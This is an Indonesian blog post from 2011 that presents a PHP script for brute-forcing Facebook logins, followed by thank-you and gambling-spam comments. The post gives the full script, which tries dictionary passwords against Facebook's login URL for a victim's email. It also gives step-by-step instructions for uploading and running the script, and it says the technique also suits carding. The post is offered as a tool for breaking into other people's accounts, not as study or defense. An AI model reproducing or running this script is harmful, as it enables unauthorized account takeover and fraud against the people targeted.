28 February 2011

Menggagahi Facebook dengan Brute Force

Tadi siang sempat sakit kepala mengkoneksikan dataBase www.manualfocus.net, necolsen.com dan 1 domain lagi yang masih jadi litle project.. arrrgghh! bikin stress.. buat ngilangin stress iseng buka facebook, jadi males liat account-ku yang sudah amburadul tak terurus, tiba-tiba teringat program brute force yang dulu pernah kugunakan untuk ngerjain temen-temenku. Berhubung database manualfocus.net ga bisa conect juga akhirnya kugunakan untuk upload file Brute Force, tapi hanya sebentar saja soalnya harus melanjutkan proyek manualfocus.net jadi file-nya dihapus hihihi (nanti yang punya domain marah..)

Udah pada tau kan brute force itu apa??  Malah sudah ada sejak aku belum lahir. Bagi yang baru lahir bisa klik apa itu Brute Force nah sekarang paham kan kenapa diberi nama Brute Force?? Sekarang kita coba meng-implementasi-kan (wuadduh..)


Pertama, wajib punya domain dan hosting untuk upload file, ada 3 file untuk di upload ke webhosting kamu, ga susah kuq.. :

1.fb.php yang isinya skrip brute force
2.dictionary.txt
3.cookie.txt

ingat harus dalam satu folder

edit bagian ini $username ="brute@force.com";

ganti dgn e-mail korban

jalankan/eksekusi /fb.php .

Berikut script brute force:

Code: 
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.com"; // email calon korban
$dictionary ="dictionary.txt"; // digunakan sebagai list password

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :  
$line
";}
}
?>

 Setelah itu buat dictionary.txt dengan notepad, kalau mau contoh download di dictionary.txt aku males nyimpen disini, bikin error (ga tau kenapa) terahir kita bikin kue.. hehe maksudnya cookie.txt, ini yang paling mudah.. Buka notepad simpan dengan nama cookie.txt isinya biarkan kosong.

Selanjutnya, ada 2 cara meng-eksekusi file fb.php/script brute force.

1.) Menggunakan web browser. Cara ini mudah, tapi relatif lebih lama. Seperti yang kita ketahui, modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke webhosting, lalu jalankan melalui browser (seperti bikin website).

2.) Yang ini ga pernah coba, konon pakai SSH client. Cara ini lebih cepat, tapi relatif lebih sulit. Selain itu kita juga harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yang sudah terkoneksi ke server kita.

Perlu diperhatikan, ga semua FB bisa di crack dengan cara ini... semua tergantung Database dari Dictionary.txt  yang kamu bikin juga dari tingkat kerumitan Password calon korban cari aja dictionary.txt dari google copy paste dalam 1 file dictionary.txt semakin banyak isi dictionary semakin besar peluangnya menembus account facebook brute force ini bisa digunakan untuk macam-macam tujuan, ga cuma untuk facebook, bisa juga untuk carding dll.

Teknik ini sangatlah sederhana, tapi efektivitasnya luar biasa, dan tidak ada satu pun sistem yang aman dari serangan ini, meski teknik ini memakan waktu yang sangat lama, khususnya untuk password yang rumit.. 

kalau mau mempelajari lebih lanjut mungkin bisa tanya ke master-master di Indonesia Hacker Community atau belajar disini Hacker Newbie 
Happy Hunting!!

5 Komentar | Kirim Komentar:

aftabak said...

They know I just deleted my account right? Well, needless to say I just closed the window and hoped for the best. I really hope that is it though! I’ll try logging back on in 3 weeks to see if it worked. www.facebook.com log in

Master OL Shop88 said...

i look you article post, the content is really good. Bandar Bola
Poker Online
Togel
Agen Domino
Togel
Agen Poker
Situs Poker Online
RAKSASAPOKER.COM AGEN DOMINO SERVER TERBARU DAN BANDARQ TERPERCAYA
Member QQ

jaka said...

makasih gan infonya dan semoga bermanfaat

tejo said...

mantap bos artikelnya dan sangat menarik

sarmin said...

terimakasih mas buat infonya dan semoga bermanfaat

Post a Comment

Terimakasih kunjungannya, silakan tinggalkan komentar atau pesan anda setelah membaca artikel ini